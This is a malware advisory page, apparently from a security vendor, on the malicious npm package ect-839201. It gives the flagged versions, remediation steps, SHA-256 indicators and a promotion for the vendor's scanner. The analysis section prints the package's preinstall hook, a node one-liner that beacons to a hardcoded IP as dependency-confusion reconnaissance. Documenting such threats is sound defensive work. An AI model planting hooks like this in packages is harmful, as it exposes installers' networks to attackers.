Which versions of ect-839201 are malicious?

The following npm versions of ect-839201 are flagged malicious: 100.0.0, 100.0.1, 100.0.2, 100.0.3, 100.0.4, 100.0.5, 100.0.6, 100.0.7, 100.0.8, 100.0.9, 100.0.10. Treat any of these as compromised.

How do I remediate ect-839201 if I installed it?

Remove ect-839201 from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Can O3 Security detect ect-839201 in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking ect-839201 and packages like it before any post-install script runs.

Malicious package

ect-839201npm

Malicious code in ect-839201 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5720

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall ect-839201

What this malware does

package.json declares a preinstall lifecycle hook that runs node -e "require('http').get('http://10.107.121.85:8001/callback_839201')" on npm install. This unconditionally issues an HTTP GET to a hardcoded RFC1918 address (10.107.121.85:8001) over plaintext, with a path (/callback_839201) that encodes a unique per-package probe identifier. The behavior fires automatically as part of the install lifecycle with no opt-in. The combination of (a) a bare-IP, non-publisher destination, (b) a unique callback identifier matched to the package name, and (c) plaintext HTTP on an internal/private network is the canonical dependency-confusion reconnaissance beacon: it confirms reachability from the installer's network into an attacker-controlled listener and leaks the installer's source IP, install timing, and the fact that this specific probe package resolved inside the target environment. Even though the captured request body is empty, the install itself is the signal — successful callbacks identify victim networks for follow-on attacks.

Malicious versions

11 flagged

100.0.0100.0.1100.0.2100.0.3100.0.4100.0.5100.0.6100.0.7100.0.8100.0.9100.0.10

Indicators of compromise (SHA-256)

0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3

bc2c87ec3e641238241b56b82bb2f23b1233cb0ee45b84d9a3d13fad5c5bc39f

cd3b1145f4a6431cfab9f99386ca5f3836264e9227645c0737f79063f5928c95

137f5864651bbecabccb0ab802dabf21d4847a2356298863fe8ec6f95bbcd905

7504c126c6e8e509d3735d2d3edaadff2de6dab101bbacbde12b40ee573edcd9

79672d260811398772fd28f2b618220b4e7f6d929e54faedaf00b989f32b9e54

b5d429604f05d4613e89de662cf9a108b7da207b369eac2eb743c23aaa64831c

2d03fd94028c2a6683f9a8e5f9636f5e0a16cf30ef3f07535344bd7843c53383

4f438d2e4debb57e29127b425a84338182bd31d2130b5340d41610dc96a09a62

6103a4281c0985ff8219f68391662609fdcef51e0df00680b776d91180dbfbe3

69cfc3f6e8933ee43116255f4d6fff43c12a1ad7b52afba21890cf2fa2f37e17

Frequently asked questions

No. ect-839201 on npm has been identified as a malicious package (versions 100.0.0, 100.0.1, 100.0.2, 100.0.3, 100.0.4, 100.0.5, 100.0.6, 100.0.7, and 3 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006253IN-MAL-2026-006259IN-MAL-2026-006248IN-MAL-2026-006257IN-MAL-2026-006262IN-MAL-2026-006263IN-MAL-2026-006255IN-MAL-2026-006260IN-MAL-2026-006250IN-MAL-2026-006246IN-MAL-2026-006252

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection